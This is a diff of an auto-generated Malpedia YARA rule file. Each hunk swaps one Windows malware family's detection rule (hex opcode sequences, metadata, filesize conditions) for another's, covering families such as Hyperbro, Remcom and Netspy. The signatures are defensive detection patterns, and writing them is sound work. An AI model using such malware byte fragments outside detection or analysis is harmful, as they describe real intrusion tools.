-		logic_hash = "9b2b21b13b2a3f0effe3ce03cc46e7cfe39d710a1bc6f103bbb173ad06ff9edf"
+		logic_hash = "10960e958b4b7c8c59844799eda78e681e350f46bd3cc75a9f3f73ad5cb0c26d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103419,32 +103660,32 @@ rule MALPEDIA_Win_Aperetif_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ba???????? c1e803 8d0c40 0fb7c6 c1e803 03c8 03c9 }
-		$sequence_1 = { ff15???????? 8bf8 89be8c020000 85ff 750d ff15???????? 8bf0 }
-		$sequence_2 = { ff15???????? 85c0 0f858d060000 ff15???????? 6a0f 68???????? 8d4d58 }
-		$sequence_3 = { e8???????? 83c410 894500 85c0 7536 681e010000 68???????? }
-		$sequence_4 = { e8???????? 83c408 85c0 0f8427010000 83fe06 7506 f6431018 }
-		$sequence_5 = { f6044dda3d8a0001 740e 8b450c 8b00 8b8094000000 8a0401 0fb6c0 }
-		$sequence_6 = { dd5c2410 f20f10542410 f20f59c2 f20f5cc8 e9???????? 85ff 7466 }
-		$sequence_7 = { ff0481 8b8424bc000000 ff81000b0000 40 898424bc000000 3b8424b8000000 7512 }
-		$sequence_8 = { 8b33 85f6 0f8482000000 57 8b7b04 897dfc 3bf7 }
-		$sequence_9 = { ff742448 ff742424 ff742448 53 e8???????? 83c414 85c0 }
+		$sequence_0 = { c60647 89c1 80c107 308c04d6000000 40 75f1 8db424c4000000 }
+		$sequence_1 = { 7c70 a1???????? 8d48ff 0fafc8 83e101 7460 ff75e4 }
+		$sequence_2 = { ff75ec ffd0 8b4df0 e8???????? 89f9 e8???????? 31c0 }
+		$sequence_3 = { c7460428381836 c746080c043500 7c12 a1???????? 8d48ff 0fafc8 83e101 }
+		$sequence_4 = { ffb42474040000 ffd0 83f8ff 741f 833d????????0a 7c20 a1???????? }
+		$sequence_5 = { ffd0 c7430271706600 66c703537f 89d9 660f6e4301 660f60c0 660f61c0 }
+		$sequence_6 = { eb25 8d4a60 88e3 88cc 30dc 84c0 88a4148c000000 }
+		$sequence_7 = { e8???????? 833d????????0a 7c1a 8b0d???????? 8d51ff 0fafd1 83e201 }
+		$sequence_8 = { e9???????? 55 53 57 56 a1???????? 8b2d???????? }
+		$sequence_9 = { 81ec30010000 b8f4ffffff c7442406b792a0b4 c744240ab4a1a6a4 c744240e8eb49a00 c7042400000000 c74424141c010000 }
 
 	condition:
-		7 of them and filesize < 10500096
+		7 of them and filesize < 1067008
 }
-rule MALPEDIA_Win_Lightwork_Auto : FILE
+rule MALPEDIA_Win_Hyperbro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b31d092-dcc8-5a1c-ab90-287cfb331c0c"
+		id = "928fd5bd-5df8-568b-aeb6-54067fcb6b3c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lightwork_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hyperbro_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "27c40b18d2800b0d83c68dd39a56494e6158b954f55a7dafaeb8933b3fe805f1"
+		logic_hash = "8b88d94d4bfcc0d3fb17142bb489e5f64650c522e571881733fdf16c084eb88b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103458,32 +103699,32 @@ rule MALPEDIA_Win_Lightwork_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 885003 90 5d c3 55 89e5 8b4508 }
-		$sequence_1 = { 8b4014 83f801 7e25 8b4508 8b00 8d90ff000000 }
-		$sequence_2 = { 55 89e5 8b4508 8b4004 83c001 0fb610 8b4508 }
-		$sequence_3 = { 8b4508 0fb6400d 8845f7 8b4508 0fb6400c 84c0 740a }
-		$sequence_4 = { 8855e4 8845e0 837d0800 750f c7042410000000 e8???????? 894508 }
-		$sequence_5 = { 01d0 8b4008 39450c 7f04 c645f701 }
-		$sequence_6 = { 891424 e8???????? 83451802 8b4508 8d500f 8b4518 8944240c }
-		$sequence_7 = { 8b00 8b4014 83c00b 8945f0 }
-		$sequence_8 = { 01d0 6bd03c 8b4508 8b00 01d0 2d00fd4b02 8b5dfc }
-		$sequence_9 = { 8065fffc 8b450c 0045ff 8b4508 0fb655ff 8810 }
+		$sequence_0 = { 83c404 6882000000 6a00 50 8903 e8???????? }
+		$sequence_1 = { d1f8 8d3410 83fe40 7f37 8bc3 8bd3 }
+		$sequence_2 = { 52 6a01 8d4c2414 51 50 c744241800000000 ff15???????? }
+		$sequence_3 = { 85c0 752f 8b4304 50 }
+		$sequence_4 = { 895014 8d442410 50 8d4c2424 51 6a00 }
+		$sequence_5 = { 7412 50 e8???????? 83c404 897e18 897e1c }
+		$sequence_6 = { 51 ff15???????? 56 ffd5 5f 5e 5d }
+		$sequence_7 = { 8bdd 2bde c744243000000000 0f84c2000000 }
+		$sequence_8 = { 3bd6 0f839b020000 8b442420 2bc6 83f803 }
+		$sequence_9 = { e8???????? 8b4724 50 e8???????? 8b4f20 51 e8???????? }
 
 	condition:
-		7 of them and filesize < 1132544
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Carrotbat_Auto : FILE
+rule MALPEDIA_Win_Sodamaster_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1f5a4e61-8efd-5abd-b8fb-2f87b63c93c7"
+		id = "d1f7db4a-f731-535e-9ec7-0f94492b7206"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.carrotbat_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sodamaster_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "e53146cb3545ca99ae66e1a10fcb74cff088286f73e969b286c25b4fb9383fdf"
+		logic_hash = "fa1144cbcb2ad99084cc1ee6d93d89428028e0238c89b4c179e1b18530e08c7f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103497,32 +103738,32 @@ rule MALPEDIA_Win_Carrotbat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bce c1f905 8b0c8d20ee4000 83e61f c1e606 89040e 8b45f8 }
-		$sequence_1 = { 8945fc 6804010000 8d85f8feffff 50 6a00 ff15???????? 33c0 }
-		$sequence_2 = { 3008 8b06 8bc8 c1f905 8b0c8d20ee4000 }
-		$sequence_3 = { 8bc6 c1f805 8d148520ee4000 8b0a 83e61f }
-		$sequence_4 = { 8974241c 5f 660fbef9 66f7d7 66f7d7 c744241480000000 66f7d7 }
-		$sequence_5 = { c60000 8d85f4fdffff 6a5c 50 }
-		$sequence_6 = { f5 0f88d7feffff d2df 660fa5cf }
-		$sequence_7 = { ff35???????? 8f442420 66c7442404beba 66c7442408844e e8???????? 8d642418 e8???????? }
-		$sequence_8 = { 53 660fb6cb 893424 0fc9 f6d5 9c ff3424 }
-		$sequence_9 = { 897de4 8bc7 c1f805 8bcf 83e11f c1e106 8b048520ee4000 }
+		$sequence_0 = { 5d c3 8b04c5d4ca0010 5d c3 8bff 55 }
+		$sequence_1 = { 83c002 6685c9 75f5 8b8d14fbffff 2bc2 }
+		$sequence_2 = { 8b748104 40 6a64 8945e8 ff15???????? 3bf3 }
+		$sequence_3 = { 8bc3 c1f805 8d3c85a0330110 8bf3 83e61f c1e606 }
+		$sequence_4 = { a3???????? a1???????? c705????????ee5c0010 8935???????? a3???????? }
+		$sequence_5 = { 2bc1 8d8df0efffff 51 8bc8 e8???????? 8b35???????? 83c404 }
+		$sequence_6 = { 52 51 d1f8 50 8d9524ffffff }
+		$sequence_7 = { 85c0 743a 8b55ec 52 ff15???????? 8bf8 }
+		$sequence_8 = { 0f84d5000000 8b95e8efffff 53 8d85dcefffff 50 }
+		$sequence_9 = { ff15???????? eb10 c745da64006c00 b96c000000 66894dde }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 134144
 }
-rule MALPEDIA_Win_Nautilus_Auto : FILE
+rule MALPEDIA_Win_Yarat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5820a14f-f3d2-5304-9417-3caef70672d9"
+		id = "26d63431-4d21-54e8-9725-9df9b9ea5db9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nautilus_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yarat_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "3519ef9bb4f52e1cd4586752506ba79e61c0e796a4c0e30324274e519044d1d2"
+		logic_hash = "48d9368820ba368c523115d54deddffc1bdeeafa57938343dae7eabda399b87d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103536,32 +103777,32 @@ rule MALPEDIA_Win_Nautilus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f20f11442430 c744242821000000 8364242000 488d0de0360100 ba0d000000 e8???????? e9???????? }
-		$sequence_1 = { e8???????? be06000000 448d4601 85c0 7843 83f801 0f8e3b010000 }
-		$sequence_2 = { e9???????? 413bfc 0f84c7000000 41be20000000 eb09 413bfc 0f84b6000000 }
-		$sequence_3 = { 83f9ff 0f9dc0 85c0 7431 f20f1015???????? f20f5cd6 f20f5915???????? }
-		$sequence_4 = { f30f7f00 f3410f7f0b 4883c010 4983eb10 493bc3 72e3 }
-		$sequence_5 = { 8d43a0 894550 e8???????? 4c8b7de0 8bd8 85c0 0f851effffff }
-		$sequence_6 = { b9bb0b0000 e8???????? 418bc7 4585ed 7e10 488d4dff 8801 }
-		$sequence_7 = { 744c 83f808 0f8483000000 83f81b 7564 4983c202 4983e802 }
-		$sequence_8 = { 48896c2410 4889742418 57 4883ec20 488b4118 488be9 488bfa }
-		$sequence_9 = { ff15???????? 8bd8 85c0 74a8 83f826 0f8521010000 448b442450 }
+		$sequence_0 = { e8???????? 8d4dc4 c645fc00 e8???????? 8b8f94000000 85c9 7444 }
+		$sequence_1 = { 898d60feffff 51 52 3bc8 7734 8bb574feffff 837dec10 }
+		$sequence_2 = { 8bc1 8b96d40f0000 0bc2 7448 33c0 8bdf 3bc2 }
+		$sequence_3 = { 8b4d10 8b4514 03f2 03da 2bfa 0f85d4feffff 5f }
+		$sequence_4 = { b787 71a6 bef82d06be 6a55 9aeede8c28ce52 91 b7d3 }
+		$sequence_5 = { b9???????? 894d08 c7471020000000 84d2 750c 38931e0b0000 0f8401030000 }
+		$sequence_6 = { e8???????? 8be5 5d c3 8db760010000 6a05 }
+		$sequence_7 = { 8b4514 83c408 83c9ff 5f 5e 8908 b001 }
+		$sequence_8 = { 8975fc eb28 33f6 b9???????? b041 0f1f00 3ac2 }
+		$sequence_9 = { 8d4510 c7451000000000 50 56 e8???????? 83c40c 397d10 }
 
 	condition:
-		7 of them and filesize < 1302528
+		7 of them and filesize < 8692736
 }
-rule MALPEDIA_Win_Netspy_Auto : FILE
+rule MALPEDIA_Win_Mutabaha_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d080908e-0a12-5fdc-839c-5d0458a92f12"
+		id = "0b7c3233-e337-53ad-9db2-68c9d4c66563"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netspy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netspy_auto.yar#L1-L100"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mutabaha_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "66a516dd000926156bcdfd45ff83678e3971de0f2826970552469344651d0e0a"
+		logic_hash = "927984049f5ae8f206bee3f98c76bb65fa49de69b36e329af5d25dd2060b803c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103575,30 +103816,32 @@ rule MALPEDIA_Win_Netspy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 488b8540010000 488b8db8190000 4889c4 488b8558180000 488985d0000000 }
-		$sequence_1 = { e9???????? 488b8548340000 8b8d944d0000 4889c4 488b85484d0000 }
-		$sequence_2 = { 488b09 4863493c 4801c8 48898528340000 8b15???????? }
-		$sequence_3 = { 3d3f08c577 0f84d6280000 e9???????? 8b8584130000 }
-		$sequence_4 = { 48898d904d0000 e8???????? 4829c4 488b85500a0000 4889e1 48898d984d0000 }
-		$sequence_5 = { 0f8488000000 e9???????? 8b8554340000 3ddf29d6fa 0f84d0010000 }
-		$sequence_6 = { e8???????? 4829c4 488b8540180000 4889e2 48899550180000 }
-		$sequence_7 = { c70163382994 e8???????? 4829c4 4889e0 488985e05e0000 e9???????? }
+		$sequence_0 = { 68???????? 8d8d9cfdffff c645fc01 e8???????? 68???????? 8d8db4fdffff c645fc02 }
+		$sequence_1 = { 8d45b8 50 6a00 6a16 ff15???????? 8bbd7cfdffff 8d45b8 }
+		$sequence_2 = { 83c40c 8d85f8f3ffff 6800040000 6a00 50 e8???????? 83c40c }
+		$sequence_3 = { 68???????? 8bd0 c645fc29 8d8dd0feffff e8???????? 83c404 6aff }
+		$sequence_4 = { 89460c eb6a 8d0492 c1e003 50 8b450c 50 }
+		$sequence_5 = { 50 8d4dd4 0f43ce 53 e8???????? 8bb568ffffff }
+		$sequence_6 = { 7202 8b36 56 8d85e8fdffff 68???????? 50 }
+		$sequence_7 = { 2bca d1f9 51 57 8d8dc4fbffff e8???????? 6a10 }
+		$sequence_8 = { 6689859cfeffff 8b8598feffff c785acfeffff00000000 83f808 7213 40 8d8d84feffff }
+		$sequence_9 = { 762a 33c0 8a4e04 8bdf 895df0 84c9 745a }
 
 	condition:
-		7 of them and filesize < 12033024
+		7 of them and filesize < 1220608
 }
-rule MALPEDIA_Win_Collectorgoomba_Auto : FILE
+rule MALPEDIA_Win_Chinad_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5bb538af-60a7-5a3c-af65-3701cf208563"
+		id = "638e582c-33e3-5dc7-b819-6884369859ac"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collectorgoomba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.collectorgoomba_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chinad_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ad69a85577b2886d7cccd50f51e68db7322b59aae6c81464fad54090e92dc915"
+		logic_hash = "0909b63bc06cff243e8fe7a8bed04254856f090009be2422d2270c54ce10717f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103612,32 +103855,32 @@ rule MALPEDIA_Win_Collectorgoomba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7508 e8???????? 59 59 8845ff 8d4df4 e8???????? }
-		$sequence_1 = { ff55d8 83c40c 8b4508 0fb700 25ff000000 8845fd 8b450c }
-		$sequence_2 = { ff55b0 83c40c 8b4508 8b4008 c1e810 25ff000000 8845f8 }
-		$sequence_3 = { 8d8528ffffff 50 e8???????? 83c410 8bf0 8dbd48ffffff a5 }
-		$sequence_4 = { ff7510 8d4de0 e8???????? 8365fc00 eb09 8b45f0 83c018 }
-		$sequence_5 = { c705????????01020303 c705????????0104040e 833d????????00 740a c705????????0b060a0f c705????????08060301 c705????????040f0608 }
-		$sequence_6 = { 8b4508 0fb7401c 83c860 8b4d08 6689411c 8b4508 8b4dec }
-		$sequence_7 = { c705????????050f0f07 c705????????0c07090d c705????????0b010d0f 833d????????00 740a c705????????090c0001 c705????????0f0d050a }
-		$sequence_8 = { ff75fc 8d45f0 50 e8???????? 83c41c 688e4379a6 6a11 }
-		$sequence_9 = { ff7040 e8???????? 83c410 8945f8 837df800 7405 e9???????? }
+		$sequence_0 = { 8b8528e5ffff 0f94c1 898d3ce5ffff 8b8d24e5ffff 8b048588ec4300 ff3401 ff15???????? }
+		$sequence_1 = { 8b9dd0feffff 8b8dc0feffff c1c007 33cb 33d0 23ce }
+		$sequence_2 = { 8b5584 899554ffffff 83bd54ffffff00 750a e8???????? e9???????? c745c4ec284300 }
+		$sequence_3 = { 8b45e0 0facf010 c1e105 0ac8 c1fe10 8b7508 8bc2 }
+		$sequence_4 = { 0b9528fdffff 23b50cfdffff 2395fcfcffff 238d04fdffff 0bf1 8b8534fdffff 238528fdffff }
+		$sequence_5 = { 6a04 8d8df0efffff 51 6a06 8b95f8efffff 52 ff15???????? }
+		$sequence_6 = { 0fa4c117 c1eb09 c1e017 0bf9 8b8d34fdffff 0bd8 }
+		$sequence_7 = { 894de4 6a09 50 e8???????? 8b4ddc 33c8 }
+		$sequence_8 = { 83c108 894d90 8b55ac 8955ec 8b4590 8b4804 }
+		$sequence_9 = { 8b95d8feffff 23fe 0bf8 8bc3 c1c007 89bdd0feffff 018dd0feffff }
 
 	condition:
-		7 of them and filesize < 1400832
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Khrat_Auto : FILE
+rule MALPEDIA_Win_Asprox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6db105ed-fa5f-5732-ac42-40d20165099d"
+		id = "0520b3a3-9483-5d2a-9f24-050358cf9005"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.khrat_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.asprox_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "d3a598db6b81f9cdf5c2df41f102b4f7efaa91eac99a2097cd83dc35f1bc7100"
+		logic_hash = "45002ecaaab3dadffe3aed1cfa4261799259027c0d201b2024f1681cd43bb771"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103651,32 +103894,32 @@ rule MALPEDIA_Win_Khrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a3???????? 6a30 8d45d0 50 }
-		$sequence_1 = { 8d1d10520010 8b4d08 6bc914 8d1c19 833b00 }
-		$sequence_2 = { 7517 8b4307 0fb74b02 83e90b 8d730b 51 56 }
-		$sequence_3 = { 807b0500 757e 807b0600 7518 }
-		$sequence_4 = { 56 57 e8???????? 50 e8???????? 40 d1e0 }
-		$sequence_5 = { 8d85f8fcffff 50 8d85fcfdffff 50 6801000080 }
-		$sequence_6 = { 66c7464c0000 8db500fdffff 66c7067b00 66c746024600 66c746043800 66c746063800 66c746083500 }
-		$sequence_7 = { ffb5bcfbffff 6a00 e8???????? c60300 c64301c4 }
-		$sequence_8 = { 53 51 56 57 c785ecfdffff00000000 }
-		$sequence_9 = { 56 50 e8???????? eb0f 807b06ff 7509 }
+		$sequence_0 = { ff15???????? 898558ffffff 6a00 6a00 8b4580 50 ff15???????? }
+		$sequence_1 = { 8b4df8 898b54fa0000 8b4de4 898b58fa0000 8b4dac 898b5cfa0000 }
+		$sequence_2 = { 8b4d08 51 6801000080 ff15???????? 85c0 0f85a7010000 c745e003000000 }
+		$sequence_3 = { c6458a00 8d4584 50 8b8d08ffffff 51 ff9538ffffff }
+		$sequence_4 = { ff15???????? 898558ffffff c78560ffffff00000000 8b4d0c 898d3cffffff 6a40 6a00 }
+		$sequence_5 = { eb6a c743041c000000 eb37 8b03 83780400 0f840f0f0000 8b10 }
+		$sequence_6 = { 8bec 51 a1???????? 83c001 33d2 b900010000 f7f1 }
+		$sequence_7 = { 51 ff9538ffffff 8945bc c645c445 c645c578 c645c669 c645c774 }
+		$sequence_8 = { 52 8b4508 50 6a02 ff55f0 85c0 7535 }
+		$sequence_9 = { 52 8b85e8fbffff 50 e8???????? 83c40c 6a00 6a00 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Remcom_Auto : FILE
+rule MALPEDIA_Win_Warezov_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef2d4f9d-a666-5fde-8a7c-ad9caf209507"
+		id = "daf7c87f-56d6-5ca2-a05f-f2106f7af4ec"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remcom_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warezov"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.warezov_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "da940079f0fa67fd9b07a963cb1c1d587eae7e882a70fa0b1512503623264f37"
+		logic_hash = "76ba225e2c2800078c3a09fe679ba4718fd1f03fa3d573bef216fead7a711c12"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103690,32 +103933,32 @@ rule MALPEDIA_Win_Remcom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4dec 8b55e8 8b1d???????? 8d45ec 50 51 }
-		$sequence_1 = { 8955f8 c745fc01000000 ff15???????? 8bf0 85f6 74a5 }
-		$sequence_2 = { 8b55e4 8b45d0 52 50 ff15???????? 85c0 }
-		$sequence_3 = { 8d45e0 50 c745f400000000 ffd7 6a01 6a00 }
-		$sequence_4 = { 8b07 8b5704 51 50 8945d0 8955d4 ff15???????? }
-		$sequence_5 = { 56 e8???????? 8bc6 c1f805 8b0485e0fc4000 }
-		$sequence_6 = { ff15???????? 56 ff15???????? 56 ff15???????? 68???????? ff15???????? }
-		$sequence_7 = { 51 50 8945d0 8955d4 ff15???????? 85c0 }
-		$sequence_8 = { 83f9ff 7432 837e40ff 742c 83f8ff 7427 8b3d???????? }
-		$sequence_9 = { e8???????? 83c414 8b45fc ff34c52ce44000 53 }
+		$sequence_0 = { 83f805 7cf2 c684244002000064 c6842441020000b0 c68424420200005d c68424430200006c c684244402000063 }
+		$sequence_1 = { c64424156d c644241610 885c2417 c64424183c c6442419f9 c644241ae3 c644241b02 }
+		$sequence_2 = { 89456c 57 c64520ec c64521c7 c6452254 c645237d c64524dc }
+		$sequence_3 = { 0f857afeffff 393cb5c0214300 742e a1???????? 8d70ff 85f6 7c10 }
+		$sequence_4 = { 51 55 6aff 52 50 ff15???????? 85c0 }
+		$sequence_5 = { 83f813 7cec 56 6804010000 }
+		$sequence_6 = { 8a4b2c 8d530c 51 8b4d0c 52 50 51 }
+		$sequence_7 = { c6442459bd c644245a2a c644245b20 c644245c3b 33c0 8a5c0410 8a4c044c }
+		$sequence_8 = { 897c2474 c644246400 c7842484000000ffffffff 720d 8b442428 50 e8???????? }
+		$sequence_9 = { 898c2404010000 89942408010000 8b54246c 8d8c2498010000 898c240c010000 8b4c247c 89942410010000 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 827392
 }
-rule MALPEDIA_Win_Atmii_Auto : FILE
+rule MALPEDIA_Win_Quickheal_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "07359bf0-199f-5425-bfa3-1b99e24213c7"
+		id = "7d4dca96-7d89-573a-86d8-cd5cf725e16a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atmii_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickheal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quickheal_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "0000b9c68134784a20204e48d35d09ba08981bd4ad498b87f530c8bc9d180475"
+		logic_hash = "a577fc33ace43aa6e0de60cf56eae847992f0d2ae90d4e16ade87fbe86c88038"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -103729,38 +103972,32 @@ rule MALPEDIA_Win_Atmii_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f6c302 740a 83481804 8a0a 884810 }
-		$sequence_1 = { 83c414 68???????? 50 68???????? 68???????? ffd7 8b4e10 }
-		$sequence_2 = { eb3e 84db 743a 8d4eb0 81f9a7000000 772f 0fb68920160010 }
-		$sequence_3 = { ffd6 83f803 0f85d8000000 8d85fcfdffff 50 }
-		$sequence_4 = { 8bec 81ec00040000 837d0803 0f8ceb000000 }
-		$sequence_5 = { 83c420 8d9df8fcffff e8???????? 8b7508 c645ff01 eb27 50 }
-		$sequence_6 = { 8d8ddcfbffff 68???????? 51 ff15???????? 8d95dcfbffff 52 }
-		$sequence_7 = { c645ece9 3bca 760c 2bca }
-		$sequence_8 = { 740d 81481804010000 8a0a 884810 }
-		$sequence_9 = { ffd3 68???????? 68???????? 8985c5f9ffff ffd7 }
-		$sequence_10 = { 68???????? 51 ffd6 8d95fcf3ffff }
-		$sequence_11 = { 6a00 56 ffd7 8bd8 85db }
-		$sequence_12 = { 8d8ddcfbffff 51 e8???????? 8b55fc }
-		$sequence_13 = { 83c444 6a00 6a00 6a03 }
-		$sequence_14 = { e8???????? 8b5608 8b3d???????? 83c414 }
-		$sequence_15 = { 68???????? 8d95f8feffff 52 ffd6 0fb74306 }
+		$sequence_0 = { 8819 885101 83c102 3bc6 7cf0 5f }
+		$sequence_1 = { 8d94248c040000 6804010000 51 6aff 52 53 53 }
+		$sequence_2 = { 8bc3 c1e817 c1e309 0bc3 8bd8 8be8 }
+		$sequence_3 = { 8944242c 55 e9???????? ffd6 68???????? 57 8944243c }
+		$sequence_4 = { 8b4c2414 e8???????? 53 c705????????01000000 e8???????? 83c404 }
+		$sequence_5 = { e8???????? 83c418 e9???????? a0???????? 84c0 7555 a0???????? }
+		$sequence_6 = { 8d5c2410 83c404 8944240c c1eb04 8d740704 e8???????? 3206 }
+		$sequence_7 = { 6aff 68???????? 6a00 6a00 ffd3 8bf8 }
+		$sequence_8 = { 85c0 0f8491fcffff 8b4c241c 51 ff15???????? }
+		$sequence_9 = { 52 ffd7 85c0 7418 8b442410 c744241404010000 50 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 553984
 }
-rule MALPEDIA_Win_Webc2_Div_Auto : FILE
+rule MALPEDIA_Win_Cargobay_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c6b6bbf1-febf-5755-a6ac-7cf5cb612b94"
+		id = "19cc2286-1645-5f7d-a2c4-3ef65d16d1bb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_div_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cargobay_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "45af776ac19cdd47801cee033d12281de26b6a70cf2be832cbeda5a468ce01ab"
+		logic_hash = "2ae360967276d2625b03685b127c94c75664c2e3f32ade543c32daba4148b1b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
